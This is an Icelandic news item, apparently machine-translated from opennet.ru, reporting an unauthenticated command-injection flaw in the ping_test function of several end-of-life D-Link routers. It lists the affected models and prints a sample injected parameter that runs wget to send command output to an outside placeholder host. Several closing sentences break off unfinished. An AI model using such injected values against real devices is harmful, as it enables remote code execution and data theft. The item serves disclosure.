Í D-Link þráðlausum beinum
Athyglisvert er að samkvæmt vélbúnaðarhönnuði ætti „ping_test“ símtalið aðeins að framkvæma eftir auðkenningu, en í raun er það kallað í öllum tilvikum, óháð innskráningu á vefviðmótið. Sérstaklega, þegar þú opnar application_sec.cgi forskriftina og sendir "action=ping_test" færibreytuna, vísar handritið á auðkenningarsíðuna, en framkvæmir á sama tíma aðgerðina sem tengist ping_test. Til að keyra kóðann var annar varnarleysi notaður í ping_test sjálfu, sem kallar á ping tólið án þess að athuga rétt IP tölu sem send var til prófunar. Til dæmis, til að hringja í wget tólið og flytja niðurstöður „echo 1234“ skipunarinnar til ytri hýsils, tilgreinirðu bara færibreytuna „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Tilvist varnarleysisins hefur verið staðfest opinberlega í eftirfarandi gerðum:
- DIR-655 með vélbúnaðar 3.02b05 eða eldri;
- DIR-866L með vélbúnaðar 1.03b04 eða eldri;
- DIR-1565 með vélbúnaðar 1.01 eða eldri;
- DIR-652 (engar upplýsingar um erfiðar vélbúnaðarútgáfur eru veittar)
Stuðningstímabilið fyrir þessar gerðir er þegar útrunnið, svo D-Link
Síðar kom í ljós að varnarleysið var líka
Heimild: opennet.ru